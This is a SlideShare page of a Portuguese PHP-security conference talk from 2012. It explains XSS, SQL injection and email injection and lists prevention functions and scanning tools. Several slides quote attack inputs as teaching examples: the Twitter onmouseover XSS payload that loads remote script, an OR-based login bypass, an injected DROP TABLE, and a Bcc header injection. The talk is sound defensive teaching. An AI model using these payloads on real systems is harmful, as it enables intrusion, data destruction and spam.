Segurança em aplicações PHP       Rodrigo dos Santos        rodrigodossantos.ws             @rosantoz
Sobre mim➔   Desenvolvedor PHP desde 2004➔   Zend Certified Engineer PHP 5.3➔   Zend Framework Certified➔   Pós Graduado e...
O que iremos abordar?➔   Como acontecem os principais ataques a aplicações PHP;     PHPSC Conference 2012 – Segurança em a...
O que iremos abordar?➔   Como acontecem os principais ataques a aplicações PHP;➔   Como se previnir;     PHPSC Conference ...
O que iremos abordar?➔   Como acontecem os principais ataques a aplicações PHP;➔   Como se previnir;➔   Ferramentas de dia...
3 Regras Básicas de Segurança PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada; PHPSC Conference 2012 – Segurança em aplicações PHP -...
3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada;2) Escape os dados de saída; PHPSC Conference 2012 – S...
3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada;2) Escape os dados de saída;3) Nunca confie em seus us...
XSS – Cross-Site Scripting PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
XSS – Cross-Site Scripting  Injeção de código HTML, CSS ou      Javascript em uma página. PHPSC Conference 2012 – Seguranç...
XSS – Cross-Site ScriptingO javascript representa a maior ameaça por possibilitar:1) Redirecionar o usuário para outra pág...
XSS – Cross-Site ScriptingMas como acontece?  PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
XSS – Cross-Site ScriptingMas como acontece?  PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
XSS – Cross-Site Scripting Twitter Hackhttp://edition.cnn.com/2010/TECH/social.media/09/21/twitter.security.flaw/index.htm...
XSS – Cross-Site ScriptingTwitter Hack http://t.co/@"style="font- size:999999999999px;"onmouseover="$.getScript (http:u002...
XSS – Cross-Site ScriptingComo evitar? ➔   htmlspecialchars() ➔   htmlentities() ➔   strip_tags() ➔   Whitelist     PHPSC ...
XSS – Cross-Site ScriptingFerramenta de diagnóstico:  PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27...
SQL Injection PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
SQL Injection   Injeção de uma instrução SQL  através de parâmetros recebidos        pela por um sistema. PHPSC Conference...
SQL Injection PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
SQL InjectionMas como acontece?  PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
SQL InjectionMas como acontece?  PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
SQL InjectionMas como acontece?usuário: qualquersenha:  OR =   PHPSC Conference 2012 – Segurança em aplicações PHP - @rosa...
SQL InjectionMas como acontece?usuário: qualquersenha:  OR =   PHPSC Conference 2012 – Segurança em aplicações PHP - @rosa...
SQL InjectionMas como acontece?usuário: qualquer; DROP TABLE usuarios ; --senha: 1234   PHPSC Conference 2012 – Segurança ...
SQL InjectionMas como acontece?usuário: qualquer; DROP TABLE usuarios ; --senha: 1234   PHPSC Conference 2012 – Segurança ...
SQL InjectionComo evitar? ➔   mysql_real_escape_string() ➔   Prepared Statement     PHPSC Conference 2012 – Segurança em a...
SQL InjectionSQL Injection no mundo real  PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
SQL InjectionFerramenta de diagnóstico:  PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
Email InjectionComo acontece:  PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
Email InjectionComo acontece:Campo nome:José da Silva <josedasilva@provedor.com>nBcc <email2@provedor.com>,<email3@provedo...
Email InjectionComo evitar: ➔   Valide o email do usário; ➔   Não use mail() para enviar email;     PHPSC Conference 2012 ...
Ferramentas de Diagnóstico                             XSS Me               https://addons.mozilla.org/en-US/firefox/addon...
Ferramentas de Diagnóstico                       SQL Inject Me           https://addons.mozilla.org/en-US/firefox/addon/sq...
Ferramentas de Diagnóstico                       Skipfish           http://code.google.com/p/skipfish/downloads/list PHPSC...
Ferramentas de Diagnóstico               Acunetix (free edition)           http://www.acunetix.com/cross-site-scripting/sc...
Ferramentas de Diagnóstico                                ZAP                        code.google.com/p/zaproxy/ PHPSC Conf...
Recomendação                            OWASP                          https://www.owasp.org PHPSC Conference 2012 – Segur...
Perguntas?PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
Obrigado                              @rosantoz                      falecom@rodrigodossantos.wsPHPSC Conference 2012 – Se...
Upcoming SlideShare
Loading in...5
×

Segurança em aplicações php

3,229

Published on

Slides de minha apresentação sobre segurança em PHP no PHPSC Conference 2012.

0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,229
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
43
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Segurança em aplicações php

  1. 1. Segurança em aplicações PHP Rodrigo dos Santos rodrigodossantos.ws @rosantoz
  2. 2. Sobre mim➔ Desenvolvedor PHP desde 2004➔ Zend Certified Engineer PHP 5.3➔ Zend Framework Certified➔ Pós Graduado em Engenharia de Projetos de Software➔ Sócio-Proprietário na Ilha Web (www.ilhaweb.net) PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  3. 3. O que iremos abordar?➔ Como acontecem os principais ataques a aplicações PHP; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  4. 4. O que iremos abordar?➔ Como acontecem os principais ataques a aplicações PHP;➔ Como se previnir; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  5. 5. O que iremos abordar?➔ Como acontecem os principais ataques a aplicações PHP;➔ Como se previnir;➔ Ferramentas de diagnóstico (e de ataque); PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  6. 6. 3 Regras Básicas de Segurança PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  7. 7. 3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  8. 8. 3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada;2) Escape os dados de saída; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  9. 9. 3 Regras Básicas de Segurança1) Filtre e valide os dados de entrada;2) Escape os dados de saída;3) Nunca confie em seus usuários; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  10. 10. XSS – Cross-Site Scripting PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  11. 11. XSS – Cross-Site Scripting Injeção de código HTML, CSS ou Javascript em uma página. PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  12. 12. XSS – Cross-Site ScriptingO javascript representa a maior ameaça por possibilitar:1) Redirecionar o usuário para outra página;2) Modificar a página;3) Ler os cookies. PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  13. 13. XSS – Cross-Site ScriptingMas como acontece? PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  14. 14. XSS – Cross-Site ScriptingMas como acontece? PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  15. 15. XSS – Cross-Site Scripting Twitter Hackhttp://edition.cnn.com/2010/TECH/social.media/09/21/twitter.security.flaw/index.html PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  16. 16. XSS – Cross-Site ScriptingTwitter Hack http://t.co/@"style="font- size:999999999999px;"onmouseover="$.getScript (http:u002fu002fis.gdu002ffl9A7)"/ PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  17. 17. XSS – Cross-Site ScriptingComo evitar? ➔ htmlspecialchars() ➔ htmlentities() ➔ strip_tags() ➔ Whitelist PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  18. 18. XSS – Cross-Site ScriptingFerramenta de diagnóstico: PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  19. 19. SQL Injection PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  20. 20. SQL Injection Injeção de uma instrução SQL através de parâmetros recebidos pela por um sistema. PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  21. 21. SQL Injection PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  22. 22. SQL InjectionMas como acontece? PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  23. 23. SQL InjectionMas como acontece? PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  24. 24. SQL InjectionMas como acontece?usuário: qualquersenha: OR = PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  25. 25. SQL InjectionMas como acontece?usuário: qualquersenha: OR = PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  26. 26. SQL InjectionMas como acontece?usuário: qualquer; DROP TABLE usuarios ; --senha: 1234 PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  27. 27. SQL InjectionMas como acontece?usuário: qualquer; DROP TABLE usuarios ; --senha: 1234 PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  28. 28. SQL InjectionComo evitar? ➔ mysql_real_escape_string() ➔ Prepared Statement PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  29. 29. SQL InjectionSQL Injection no mundo real PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  30. 30. SQL InjectionFerramenta de diagnóstico: PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  31. 31. Email InjectionComo acontece: PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  32. 32. Email InjectionComo acontece:Campo nome:José da Silva <josedasilva@provedor.com>nBcc <email2@provedor.com>,<email3@provedor.com>, <email4@provedor.com> PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  33. 33. Email InjectionComo evitar: ➔ Valide o email do usário; ➔ Não use mail() para enviar email; PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  34. 34. Ferramentas de Diagnóstico XSS Me https://addons.mozilla.org/en-US/firefox/addon/xss-me/ PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  35. 35. Ferramentas de Diagnóstico SQL Inject Me https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  36. 36. Ferramentas de Diagnóstico Skipfish http://code.google.com/p/skipfish/downloads/list PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  37. 37. Ferramentas de Diagnóstico Acunetix (free edition) http://www.acunetix.com/cross-site-scripting/scanner.htm PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  38. 38. Ferramentas de Diagnóstico ZAP code.google.com/p/zaproxy/ PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  39. 39. Recomendação OWASP https://www.owasp.org PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  40. 40. Perguntas?PHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  41. 41. Obrigado @rosantoz falecom@rodrigodossantos.wsPHPSC Conference 2012 – Segurança em aplicações PHP - @rosantoz – 27/10/2012
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×